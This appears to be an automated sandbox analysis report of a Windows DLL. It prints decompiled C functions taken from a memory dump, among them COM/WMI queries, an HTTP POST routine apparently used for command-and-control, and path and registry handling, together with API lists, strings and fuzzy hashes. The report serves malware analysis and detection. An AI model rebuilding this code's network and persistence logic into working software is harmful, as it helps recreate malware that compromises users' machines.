    											E100085BB( &_v96);
    											__imp__#9( &_v80);
    											goto L39;
    										}
    										_push(_v72);
    										_push(L"%d");
    										L37:
    										_push(0xc);
    										_push(_t289);
    										E10009626();
    										_t329 = _t329 + 0x10;
    										goto L38;
    									}
    									_t230 = _t219 - 1;
    									__eflags = _t230;
    									if(_t230 == 0) {
    										L33:
    										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E100085EA(0x18);
    										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
    										__eflags = _t289;
    										if(_t289 == 0) {
    											goto L38;
    										}
    										_push(_v72);
    										_push(L"%u");
    										goto L37;
    									}
    									_t235 = _t230 - 1;
    									__eflags = _t235;
    									if(_t235 == 0) {
    										goto L33;
    									}
    									__eflags = _t235 == 1;
    									if(_t235 == 1) {
    										goto L33;
    									}
    									L28:
    									__eflags = _t283 & 0x00002000;
    									if((_t283 & 0x00002000) == 0) {
    										_v88 = E100095C7(_t283, 0x219);
    										E10009626( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
    										E100085BB( &_v88);
    										_t329 = _t329 + 0x18;
    										_t298 =  &_v616;
    										L31:
    										_t242 = E100091C9(_t298);
    										L32:
    										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
    										goto L38;
    									}
    									_t242 = E1000DA2B( &_v80);
    									goto L32;
    								}
    								if(__eflags == 0) {
    									__eflags = _v72 - 0xffff;
    									_t298 = L"TRUE";
    									if(_v72 != 0xffff) {
    										_t298 = L"FALSE";
    									}
    									goto L31;
    								}
    								_t243 = _t218 - 1;
    								__eflags = _t243;
    								if(_t243 == 0) {
    									goto L38;
    								}
    								_t244 = _t243 - 1;
    								__eflags = _t244;
    								if(_t244 == 0) {
    									goto L35;
    								}
    								_t245 = _t244 - 1;
    								__eflags = _t245;
    								if(_t245 == 0) {
    									goto L35;
    								}
    								__eflags = _t245 != 5;
    								if(_t245 != 5) {
    									goto L28;
    								}
    								_t298 = _v72;
    								goto L31;
    							}
    							__imp__#16(_v24);
    							_t210 = _v28;
    							 *((intOrPtr*)( *_t210 + 8))(_t210);
    							_t252 = _v20;
    							L42:
    							_t262 = _v32;
    							_t252 = _t252 + 1;
    							_v20 = _t252;
    							__eflags = _t262;
    							if(_t262 != 0) {
    								continue;
    							}
    							L48:
    							_t324 = _v40;
    							goto L49;
    						}
    						_t247 = _v28;
    						 *((intOrPtr*)( *_t247 + 8))(_t247);
    						goto L42;
    					}
    					_t262 = _v32;
    					goto L48;
    				} else {
    					E10008600( &_v36, _t322);
    					_t320 = _v36;
    					goto L53;
    				}
    			}

    APIs
      • Part of subcall function 1000D52E: CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000000,00000000,?,1000D82E,00000C5B,00000000,?,00000000), ref: 1000D541
      • Part of subcall function 1000D52E: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,1000D82E,00000C5B,00000000,?,00000000), ref: 1000D552
      • Part of subcall function 1000D52E: CoCreateInstance.OLE32(1001B840,00000000,00000001,1001B850,?,?,1000D82E,00000C5B,00000000,?,00000000), ref: 1000D569
      • Part of subcall function 1000D52E: SysAllocString.OLEAUT32(00000000), ref: 1000D574
      • Part of subcall function 1000D52E: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,1000D82E,00000C5B,00000000,?,00000000), ref: 1000D59F
      • Part of subcall function 100085EA: HeapAlloc.KERNEL32(00000008,?,?,10008F6A,00000100,?,10005FA8), ref: 100085F8
    • SysAllocString.OLEAUT32(00000000), ref: 1000DBF0
    • SysAllocString.OLEAUT32(00000000), ref: 1000DC04
    • SysFreeString.OLEAUT32(?), ref: 1000DF8D
    • SysFreeString.OLEAUT32(?), ref: 1000DF96
      • Part of subcall function 10008600: HeapFree.KERNEL32(00000000,00000000,00000001,000000FF,10006020), ref: 10008646
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID: String$Alloc$Free$HeapInitialize$BlanketCreateInstanceProxySecurity
    • String ID: FALSE$TRUE
    • API String ID: 224402418-1412513891
    • Opcode ID: e90d5b011f5971edd279b69304d2787e03839083f027a6c7d93be243f4a939b2
    • Instruction ID: 87b8d808fb387f8005252730a36ddfdad2d71f946437a17ee317db8df35d95d4
    • Opcode Fuzzy Hash: e90d5b011f5971edd279b69304d2787e03839083f027a6c7d93be243f4a939b2
    • Instruction Fuzzy Hash: 82E16375D006199FEB05EFE4CC85EEEBBB9FF08380F10455AE505AB259DB31AA05CB60
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 83%
    			E1000E673(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
    				char _v8;
    				char _v12;
    				signed int _v16;
    				signed int _v20;
    				char _v24;
    				intOrPtr _v28;
    				char _v32;
    				intOrPtr _v36;
    				signed int _v40;
    				signed int _v44;
    				intOrPtr _v48;
    				intOrPtr _v52;
    				intOrPtr _v56;
    				intOrPtr _v60;
    				char _v64;
    				int _v76;
    				void* _v80;
    				intOrPtr _v100;
    				int _v104;
    				void* _v108;
    				intOrPtr _v112;
    				intOrPtr _v116;
    				char* _v120;
    				void _v124;
    				char _v140;
    				void _v396;
    				void _v652;
    				intOrPtr _t105;
    				intOrPtr _t113;
    				intOrPtr* _t115;
    				intOrPtr _t118;
    				intOrPtr _t121;
    				intOrPtr _t124;
    				intOrPtr _t127;
    				intOrPtr _t131;
    				char _t133;
    				intOrPtr _t136;
    				char _t138;
    				char _t139;
    				intOrPtr _t141;
    				intOrPtr _t147;
    				intOrPtr _t154;
    				intOrPtr _t158;
    				intOrPtr _t162;
    				intOrPtr _t164;
    				intOrPtr _t166;
    				intOrPtr _t172;
    				intOrPtr _t176;
    				void* _t183;
    				void* _t185;
    				intOrPtr _t186;
    				char _t195;
    				intOrPtr _t203;
    				intOrPtr _t204;
    				signed int _t209;
    				void _t212;
    				intOrPtr _t213;
    				void* _t214;
    				intOrPtr _t216;
    				char _t217;
    				intOrPtr _t218;
    				signed int _t219;
    				signed int _t220;
    				void* _t221;
    
    				_v40 = _v40 & 0x00000000;
    				_v24 = 4;
    				_v36 = 1;
    				_t214 = __edx;
    				memset( &_v396, 0, 0x100);
    				memset( &_v652, 0, 0x100);
    				_v64 = E100095AD(0x85b);
    				_v60 = E100095AD(0xdc9);
    				_v56 = E100095AD(0x65d);
    				_v52 = E100095AD(0xdd3);
    				_t105 = E100095AD(0xb74);
    				_v44 = _v44 & 0;
    				_t212 = 0x3c;
    				_v48 = _t105;
    				memset( &_v124, 0, 0x100);
    				_v116 = 0x10;
    				_v120 =  &_v140;
    				_v124 = _t212;
    				_v108 =  &_v396;
    				_v104 = 0x100;
    				_v80 =  &_v652;
    				_push( &_v124);
    				_push(0);
    				_v76 = 0x100;
    				_push(E1000C384(_t214));
    				_t113 =  *0x1001e6a4; // 0x0
    				_push(_t214);
    				if( *((intOrPtr*)(_t113 + 0x28))() != 0) {
    					_t209 = 0;
    					_v20 = 0;
    					do {
    						_t115 =  *0x1001e6a4; // 0x0
    						_v12 = 0x8404f700;
    						_t213 =  *_t115( *0x1001e788,  *((intOrPtr*)(_t221 + _t209 * 4 - 0x24)), 0, 0, 0);
    						if(_t213 != 0) {
    							_t195 = 3;
    							_t185 = 4;
    							_v8 = _t195;
    							_t118 =  *0x1001e6a4; // 0x0
    							 *((intOrPtr*)(_t118 + 0x14))(_t213, _t195,  &_v8, _t185);
    							_v8 = 0x3a98;
    							_t121 =  *0x1001e6a4; // 0x0
    							 *((intOrPtr*)(_t121 + 0x14))(_t213, 2,  &_v8, _t185);
    							_v8 = 0x493e0;
    							_t124 =  *0x1001e6a4; // 0x0
    							 *((intOrPtr*)(_t124 + 0x14))(_t213, 6,  &_v8, _t185);
    							_v8 = 0x493e0;
    							_t127 =  *0x1001e6a4; // 0x0
    							 *((intOrPtr*)(_t127 + 0x14))(_t213, 5,  &_v8, _t185);
    							_t131 =  *0x1001e6a4; // 0x0
    							_t186 =  *((intOrPtr*)(_t131 + 0x1c))(_t213,  &_v396, _v100, 0, 0, 3, 0, 0);
    							if(_a24 != 0) {
    								E100097F2(_a24);
    							}
    							if(_t186 != 0) {
    								_t133 = 0x8484f700;
    								if(_v112 != 4) {
    									_t133 = _v12;
    								}
    								_t136 =  *0x1001e6a4; // 0x0
    								_t216 =  *((intOrPtr*)(_t136 + 0x20))(_t186, "POST",  &_v652, 0, 0,  &_v64, _t133, 0);
    								_v8 = _t216;
    								if(_a24 != 0) {
    									E100097F2(_a24);
    								}
    								if(_t216 != 0) {
    									_t138 = 4;
    									if(_v112 != _t138) {
    										L19:
    										_t139 = E100095AD(0x777);
    										_t217 = _t139;
    										_v12 = _t217;
    										_t141 =  *0x1001e6a4; // 0x0
    										_t218 = _v8;
    										_v28 =  *((intOrPtr*)(_t141 + 0x24))(_t218, _t217, E1000C384(_t217), _a4, _a8);
    										E100085A8( &_v12);
    										if(_a24 != 0) {
    											E100097F2(_a24);
    										}
    										if(_v28 != 0) {
    											L28:
    											_v24 = 8;
    											_push(0);
    											_v32 = 0;
    											_v28 = 0;
    											_push( &_v24);
    											_push( &_v32);
    											_t147 =  *0x1001e6a4; // 0x0
    											_push(0x13);
    											_push(_t218);
    											if( *((intOrPtr*)(_t147 + 0xc))() != 0) {
    												_t219 = E1000972F( &_v32);
    												if(_t219 == 0xc8) {
    													 *_a20 = _v8;
    													 *_a12 = _t213;
    													 *_a16 = _t186;
    													return 0;
    												}
    												_t220 =  ~_t219;
    												L32:
    												_t154 =  *0x1001e6a4; // 0x0
    												 *((intOrPtr*)(_t154 + 8))(_v8);
    												L33:
    												if(_t186 != 0) {
    													_t158 =  *0x1001e6a4; // 0x0
    													 *((intOrPtr*)(_t158 + 8))(_t186);
    												}
    												if(_t213 != 0) {
    													_t203 =  *0x1001e6a4; // 0x0
    													 *((intOrPtr*)(_t203 + 8))(_t213);
    												}
    												return _t220;
    											}
    											GetLastError();
    											_t220 = 0xfffffff8;
    											goto L32;
    										} else {
    											GetLastError();
    											_t162 =  *0x1001e6a4; // 0x0
    											 *((intOrPtr*)(_t162 + 8))(_t218);
    											_t218 = 0;
    											goto L23;
    										}
    									}
    									_v12 = _t138;
    									_push( &_v12);
    									_push( &_v16);
    									_t172 =  *0x1001e6a4; // 0x0
    									_push(0x1f);
    									_push(_t216);
    									if( *((intOrPtr*)(_t172 + 0x18))() == 0) {
    										L18:
    										GetLastError();
    										goto L19;
    									}
    									_v16 = _v16 | 0x00003380;
    									_push(4);
    									_push( &_v16);
    									_t176 =  *0x1001e6a4; // 0x0
    									_push(0x1f);
    									_push(_t216);
    									if( *((intOrPtr*)(_t176 + 0x14))() != 0) {
    										goto L19;
    									}
    									goto L18;
    								} else {
    									GetLastError();
    									L23:
    									_t164 =  *0x1001e6a4; // 0x0
    									 *((intOrPtr*)(_t164 + 8))(_t186);
    									_t186 = 0;
    									goto L24;
    								}
    							} else {
    								GetLastError();
    								L24:
    								_t166 =  *0x1001e6a4; // 0x0
    								 *((intOrPtr*)(_t166 + 8))(_t213);
    								_t213 = 0;
    								goto L25;
    							}
    						}
    						GetLastError();
    						L25:
    						_t204 = _t218;
    						_t209 = _v20 + 1;
    						_v20 = _t209;
    					} while (_t209 < 2);
    					_v8 = _t218;
    					if(_t204 != 0) {
    						goto L28;
    					}
    					_t220 = 0xfffffffe;
    					goto L33;
    				}
    				_t183 = 0xfffffffc;
    				return _t183;
    			}

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID: memset$ErrorLast
    • String ID: POST
    • API String ID: 2570506013-1814004025
    • Opcode ID: b2cbd98b9ed9432ed6e1f8a9232582811ae6687bac74e989c4c0fe043f55e73f
    • Instruction ID: 7105dce4f630bd9e6e6a53a20e835c867cf8d9cfb236b462118b6997004ea025
    • Opcode Fuzzy Hash: b2cbd98b9ed9432ed6e1f8a9232582811ae6687bac74e989c4c0fe043f55e73f
    • Instruction Fuzzy Hash: C2B14CB1900259AFEB55DFA4CC88E9E7BF8EF48390F108069F505EB291DB749E44CB61
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 28%
    			E100116C3(signed int* _a4) {
    				char _v8;
    				_Unknown_base(*)()* _v12;
    				_Unknown_base(*)()* _v16;
    				char _v20;
    				_Unknown_base(*)()* _t16;
    				_Unknown_base(*)()* _t17;
    				void* _t22;
    				intOrPtr* _t28;
    				signed int _t29;
    				signed int _t30;
    				struct HINSTANCE__* _t32;
    				void* _t34;
    
    				_t30 = 0;
    				_v8 = 0;
    				_t32 = GetModuleHandleA("advapi32.dll");
    				if(_t32 == 0) {
    					L9:
    					return 1;
    				}
    				_t16 = GetProcAddress(_t32, "CryptAcquireContextA");
    				_v12 = _t16;
    				if(_t16 == 0) {
    					goto L9;
    				}
    				_t17 = GetProcAddress(_t32, "CryptGenRandom");
    				_v16 = _t17;
    				if(_t17 == 0) {
    					goto L9;
    				}
    				_t28 = GetProcAddress(_t32, "CryptReleaseContext");
    				if(_t28 == 0) {
    					goto L9;
    				}
    				_push(0xf0000000);
    				_push(1);
    				_push(0);
    				_push(0);
    				_push( &_v8);
    				if(_v12() == 0) {
    					goto L9;
    				}
    				_t22 = _v16(_v8, 4,  &_v20);
    				 *_t28(_v8, 0);
    				if(_t22 == 0) {
    					goto L9;
    				}
    				_t29 = 0;
    				do {
    					_t30 = _t30 << 0x00000008 |  *(_t34 + _t29 - 0x10) & 0x000000ff;
    					_t29 = _t29 + 1;
    				} while (_t29 < 4);
    				 *_a4 = _t30;
    				return 0;
    			}

    APIs
    • GetModuleHandleA.KERNEL32(advapi32.dll,00000000,00000000,00000000,10007640,?,?,00000000,?), ref: 100116D6
    • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 100116EE
    • GetProcAddress.KERNEL32(00000000,CryptGenRandom), ref: 100116FD
    • GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 1001170C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID: AddressProc$HandleModule
    • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
    • API String ID: 667068680-129414566
    • Opcode ID: ec5d92e1c0308c86bfae05b88449f1b683c9b71fc9a535634b09132dc4920ded
    • Instruction ID: db89102dffd2ab17b34e924f896f3f155d97b8305924242c9699015d1af8b324
    • Opcode Fuzzy Hash: ec5d92e1c0308c86bfae05b88449f1b683c9b71fc9a535634b09132dc4920ded
    • Instruction Fuzzy Hash: 32119431A04619BADB51DBB98C84DFE7BFAEF45640F100464EA05EB280D730CB408B64
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 87%
    			E1001212D(char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
    				signed int _t12;
    				signed int _t13;
    				int _t15;
    				char* _t24;
    				char* _t26;
    				char* _t28;
    				char* _t29;
    				signed int _t40;
    				char* _t43;
    				char* _t45;
    				long long* _t47;
    
    				_t12 = _a20;
    				if(_t12 == 0) {
    					_t12 = 0x11;
    				}
    				_t26 = _a4;
    				_push(_t30);
    				 *_t47 = _a12;
    				_push(_t12);
    				_push("%.*g");
    				_push(_a8);
    				_push(_t26);
    				L10012290();
    				_t40 = _t12;
    				if(_t40 < 0 || _t40 >= _a8) {
    					L19:
    					_t13 = _t12 | 0xffffffff;
    					goto L20;
    				} else {
    					L100122D8();
    					_t15 =  *((intOrPtr*)( *_t12));
    					if(_t15 != 0x2e) {
    						_t24 = strchr(_t26, _t15);
    						if(_t24 != 0) {
    							 *_t24 = 0x2e;
    						}
    					}
    					if(strchr(_t26, 0x2e) != 0 || strchr(_t26, 0x65) != 0) {
    						L11:
    						_t43 = strchr(_t26, 0x65);
    						_t28 = _t43;
    						if(_t43 == 0) {
    							L18:
    							_t13 = _t40;
    							L20:
    							return _t13;
    						}
    						_t45 = _t43 + 1;
    						_t29 = _t28 + 2;
    						if( *_t45 == 0x2d) {
    							_t45 = _t29;
    						}
    						while( *_t29 == 0x30) {
    							_t29 = _t29 + 1;
    						}
    						if(_t29 != _t45) {
    							E100086EC(_t45, _t29, _t40 - _t29 + _a4);
    							_t40 = _t40 + _t45 - _t29;
    						}
    						goto L18;
    					} else {
    						_t6 = _t40 + 3; // 0x100109bd
    						_t12 = _t6;
    						if(_t12 >= _a8) {
    							goto L19;
    						}
    						_t26[_t40] = 0x302e;
    						( &(_t26[2]))[_t40] = 0;
    						_t40 = _t40 + 2;
    						goto L11;
    					}
    				}
    			}

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID: strchr$_snprintflocaleconv
    • String ID: %.*g
    • API String ID: 1910550357-952554281
    • Opcode ID: 178342c51bf590373a94578d315e398ece8844776024473a8b6624bac67a40ef
    • Instruction ID: 78b3385665a9946d17acecbf697c3f69bb23403c9f6092c9c513caadce452e38
    • Opcode Fuzzy Hash: 178342c51bf590373a94578d315e398ece8844776024473a8b6624bac67a40ef
    • Instruction Fuzzy Hash: FD2145FA60424A3AE321CA689C85BAF37DCDF11270F150115FE408F182E674ECF083A0
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID: _snprintfqsort
    • String ID: %I64d$false$null$true
    • API String ID: 756996078-4285102228
    • Opcode ID: d538ba18bf1a1900acc1de5f1acfcc1d0ab55a19687b0d007d211ebddbd5affd
    • Instruction ID: 256b45a573985ee8e5ebbb4f1a01ee0a2bda1a8772a5177783226d7c6d43e220
    • Opcode Fuzzy Hash: d538ba18bf1a1900acc1de5f1acfcc1d0ab55a19687b0d007d211ebddbd5affd
    • Instruction Fuzzy Hash: 1AE17FB1A0020ABFDF11DE65CC46EEF3BA9EF44384F108015FD949E151E7B1DAA19BA1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E10004A0C(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
    				char _v516;
    				void _v1044;
    				char _v1076;
    				signed int _v1080;
    				signed int _v1096;
    				WCHAR* _v1100;
    				intOrPtr _v1104;
    				signed int _v1108;
    				intOrPtr _v1112;
    				intOrPtr _v1116;
    				char _v1144;
    				char _v1148;
    				void* __esi;
    				intOrPtr _t66;
    				intOrPtr _t73;
    				signed int _t75;
    				intOrPtr _t76;
    				signed int _t81;
    				WCHAR* _t87;
    				void* _t89;
    				signed int _t90;
    				signed int _t91;
    				signed int _t93;
    				signed int _t94;
    				WCHAR* _t96;
    				intOrPtr _t106;
    				intOrPtr _t107;
    				void* _t108;
    				intOrPtr _t109;
    				signed char _t116;
    				WCHAR* _t118;
    				void* _t122;
    				signed int _t123;
    				intOrPtr _t125;
    				void* _t128;
    				void* _t129;
    				WCHAR* _t130;
    				void* _t134;
    				void* _t141;
    				void* _t143;
    				WCHAR* _t145;
    				signed int _t153;
    				void* _t154;
    				void* _t178;
    				signed int _t180;
    				void* _t181;
    				void* _t183;
    				void* _t187;
    				signed int _t188;
    				WCHAR* _t190;
    				signed int _t191;
    				signed int _t192;
    				intOrPtr* _t194;
    				signed int _t196;
    				void* _t199;
    				void* _t200;
    				void* _t201;
    				void* _t202;
    				intOrPtr* _t203;
    				void* _t208;
    
    				_t208 = __fp0;
    				_push(_t191);
    				_t128 = __edx;
    				_t187 = __ecx;
    				_t192 = _t191 | 0xffffffff;
    				memset( &_v1044, 0, 0x20c);
    				_t199 = (_t196 & 0xfffffff8) - 0x454 + 0xc;
    				_v1108 = 1;
    				if(_t187 != 0) {
    					_t123 =  *0x1001e688; // 0x2ff04a0
    					_t125 =  *0x1001e68c; // 0x306fa40
    					_v1116 =  *((intOrPtr*)(_t125 + 0x68))(_t187,  *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x110)))));
    				}
    				if(E1000BB73(_t187) != 0) {
    					L4:
    					_t134 = _t128;
    					_t66 = E1000B78E(_t134,  &_v516);
    					_push(_t134);
    					_v1104 = _t66;
    					E1000B663(_t66,  &_v1076, _t206, _t208);
    					_t129 = E100049C8( &_v1076,  &_v1076, _t206);
    					_t141 = E1000D40B( &_v1076, E1000C384( &_v1076), 0);
    					E1000B870(_t141,  &_v1100, _t208);
    					_t175 =  &_v1076;
    					_t73 = E10002C8F(_t187,  &_v1076, _t206, _t208);
    					_v1112 = _t73;
    					_t143 = _t141;
    					if(_t73 != 0) {
    						_push(0);
    						_push(_t129);
    						_push("\\");
    						_t130 = E100092CB(_t73);
    						_t200 = _t199 + 0x10;
    						_t75 =  *0x1001e688; // 0x2ff04a0
    						__eflags =  *((intOrPtr*)(_t75 + 0x214)) - 3;
    						if( *((intOrPtr*)(_t75 + 0x214)) != 3) {
    							L12:
    							__eflags = _v1108;
    							if(__eflags != 0) {
    								_t76 = E100091C9(_v1112);
    								_t145 = _t130;
    								 *0x1001e740 = _t76;
    								 *0x1001e738 = E100091C9(_t145);
    								L17:
    								_push(_t145);
    								_t188 = E10009B29( &_v1044, _t187, _t208, _v1104,  &_v1080,  &_v1100);
    								_t201 = _t200 + 0x10;
    								__eflags = _t188;
    								if(_t188 == 0) {
    									goto L41;
    								}
    								_push(0x1001b9c2);
    								E10009F2E(0xe);
    								E10009F52(_t188, _t208, _t130);
    								_t194 = _a4;
    								_v1096 = _v1096 & 0x00000000;
    								_push(2);
    								_v1100 =  *_t194;
    								_push(8);
    								_push( &_v1100);
    								_t178 = 0xb;
    								E1000A091(_t188, _t178, _t208);
    								_t179 =  *(_t194 + 0x10);
    								_t202 = _t201 + 0xc;
    								__eflags =  *(_t194 + 0x10);
    								if( *(_t194 + 0x10) != 0) {
    									E1000A3D3(_t188, _t179, _t208);
    								}
    								_t180 =  *(_t194 + 0xc);
    								__eflags = _t180;
    								if(_t180 != 0) {
    									E1000A3D3(_t188, _t180, _t208);
    								}
    								_t87 = E100097F2(0);
    								_push(2);
    								_v1100 = _t87;
    								_t153 = _t188;
    								_push(8);
    								_v1096 = _t180;
    								_push( &_v1100);
    								_t181 = 2;
    								_t89 = E1000A091(_t153, _t181, _t208);
    								_t203 = _t202 + 0xc;
    								__eflags = _v1108;
    								if(_v1108 == 0) {
    									_t153 =  *0x1001e688; // 0x2ff04a0
    									__eflags =  *((intOrPtr*)(_t153 + 0xa4)) - 1;
    									if(__eflags != 0) {
    										_t90 = E1000FC2A(_t89, _t181, _t208, 0, _t130, 0);
    										_t203 = _t203 + 0xc;
    										goto L26;
    									}
    									_t153 = _t153 + 0x228;
    									goto L25;
    								} else {
    									_t91 =  *0x1001e688; // 0x2ff04a0
    									__eflags =  *((intOrPtr*)(_t91 + 0xa4)) - 1;
    									if(__eflags != 0) {
    										L32:
    										__eflags =  *(_t91 + 0x1898) & 0x00000082;
    										if(( *(_t91 + 0x1898) & 0x00000082) != 0) {
    											_t183 = 0x64;
    											E1000E249(_t183);
    										}
    										E100052A8( &_v1076, _t208);
    										_t190 = _a8;
    										_t154 = _t153;
    										__eflags = _t190;
    										if(_t190 != 0) {
    											_t94 =  *0x1001e688; // 0x2ff04a0
    											__eflags =  *((intOrPtr*)(_t94 + 0xa0)) - 1;
    											if( *((intOrPtr*)(_t94 + 0xa0)) != 1) {
    												lstrcpyW(_t190, _t130);
    											} else {
    												_t96 = E1000109A(_t154, 0x228);
    												_v1100 = _t96;
    												lstrcpyW(_t190, _t96);
    												E100085BB( &_v1100);
    												 *_t203 = "\"";
    												lstrcatW(_t190, ??);
    												lstrcatW(_t190, _t130);
    												lstrcatW(_t190, "\"");
    											}
    										}
    										_t93 = _a12;
    										__eflags = _t93;
    										if(_t93 != 0) {
    											 *_t93 = _v1104;
    										}
    										_t192 = 0;
    										__eflags = 0;
    										goto L41;
    									}
    									_t51 = _t91 + 0x228; // 0x2ff06c8
    									_t153 = _t51;
    									L25:
    									_t90 = E10005527(_t153, _t130, __eflags);
    									L26:
    									__eflags = _t90;
    									if(_t90 >= 0) {
    										_t91 =  *0x1001e688; // 0x2ff04a0
    										goto L32;
    									}
    									_push(0xfffffffd);
    									L6:
    									_pop(_t192);
    									goto L41;
    								}
    							}
    							_t106 = E1000C29D(_v1104, __eflags);
    							_v1112 = _t106;
    							_t107 =  *0x1001e684; // 0x306f878
    							_t108 =  *((intOrPtr*)(_t107 + 0xd0))(_t106, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
    							__eflags = _t108 - _t192;
    							if(_t108 != _t192) {
    								_t109 =  *0x1001e684; // 0x306f878
    								 *((intOrPtr*)(_t109 + 0x30))();
    								E10008600( &_v1148, _t192);
    								_t145 = _t108;
    								goto L17;
    							}
    							E10008600( &_v1144, _t192);
    							_t81 = 1;
    							goto L42;
    						}
    						_t116 =  *(_t75 + 0x1898);
    						__eflags = _t116 & 0x00000004;
    						if((_t116 & 0x00000004) == 0) {
    							__eflags = _t116;
    							if(_t116 != 0) {
    								goto L12;
    							}
    							L11:
    							E1000E291(_v1112, _t175);
    							goto L12;
    						}
    						_v1080 = _v1080 & 0x00000000;
    						_t118 = E100095C7(_t143, 0x879);
    						_v1100 = _t118;
    						_t175 = _t118;
    						E1000BFF7(0x80000002, _t118, _v1112, 4,  &_v1080, 4);
    						E100085BB( &_v1100);
    						_t200 = _t200 + 0x14;
    						goto L11;
    					}
    					_push(0xfffffffe);
    					goto L6;
    				} else {
    					_t122 = E10002BA4( &_v1044, _t192, 0x105);
    					_t206 = _t122;
    					if(_t122 == 0) {
    						L41:
    						_t81 = _t192;
    						L42:
    						return _t81;
    					}
    					goto L4;
    				}
    			}

    APIs
    • memset.MSVCRT ref: 10004A2E
    • lstrcpyW.KERNEL32(00000000,00000000), ref: 10004D20
    • lstrcatW.KERNEL32(00000000,?), ref: 10004D3E
    • lstrcatW.KERNEL32(00000000,00000000), ref: 10004D42
    • lstrcatW.KERNEL32(00000000,1001B994), ref: 10004D4A
    • lstrcpyW.KERNEL32(00000000,00000000), ref: 10004D50
    Memory Dump Source
    • Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID: lstrcat$lstrcpy$memset
    • String ID:
    • API String ID: 1985475764-0
    • Opcode ID: 62969c4e8768608e47be4c88e0413589d716b6224435312465d12a19acd94c00
    • Instruction ID: 7ccac8b502451e5b7a742acc225b8edaafd8b9eb524e624c54795ddda11a0b18
    • Opcode Fuzzy Hash: 62969c4e8768608e47be4c88e0413589d716b6224435312465d12a19acd94c00
    • Instruction Fuzzy Hash: 3391ADB5604301ABF304DB20DC86F6E73E9EB84390F124A2DF5559B299EF70ED448B56
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • SysAllocString.OLEAUT32(00000000), ref: 1000D767
    • SysAllocString.OLEAUT32(?), ref: 1000D76F
    • SysAllocString.OLEAUT32(00000000), ref: 1000D783
    • SysFreeString.OLEAUT32(?), ref: 1000D7FE
    • SysFreeString.OLEAUT32(?), ref: 1000D801
    • SysFreeString.OLEAUT32(?), ref: 1000D806
    Memory Dump Source
    • Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID: String$AllocFree
    • String ID:
    • API String ID: 344208780-0
    • Opcode ID: 533f58d5d8afb924d606c824253e1b92029f16f14e0bed1b48c045e6ad26739a
    • Instruction ID: 8cf6b93e2451088eb1bb9766ed2507027e49de2e01c3db39ed6556aff2126d07
    • Opcode Fuzzy Hash: 533f58d5d8afb924d606c824253e1b92029f16f14e0bed1b48c045e6ad26739a
    • Instruction Fuzzy Hash: A521FB75900219BFDB00DFA5CC88DAFBBBDEF48294B1044AAF505A7250DB70AE05CB60
    Uniqueness

    Uniqueness Score: -1.00%

    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID:
    • String ID: @$\u%04X$\u%04X\u%04X
    • API String ID: 0-2132903582
    • Opcode ID: feb80d3a04cc4fc4cf5808f9b25bd72cd22dbc47354be86eb52a922d1ecc23a5
    • Instruction ID: 5834604bd64903192ee08d211dc49906cb49224659e5567271de8e71af9a3c4a
    • Opcode Fuzzy Hash: feb80d3a04cc4fc4cf5808f9b25bd72cd22dbc47354be86eb52a922d1ecc23a5
    • Instruction Fuzzy Hash: FB413B72B04249ABEB14CDA88CA5BAE36A8DF01294F104116FDC2DE346DAF1CED183D1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
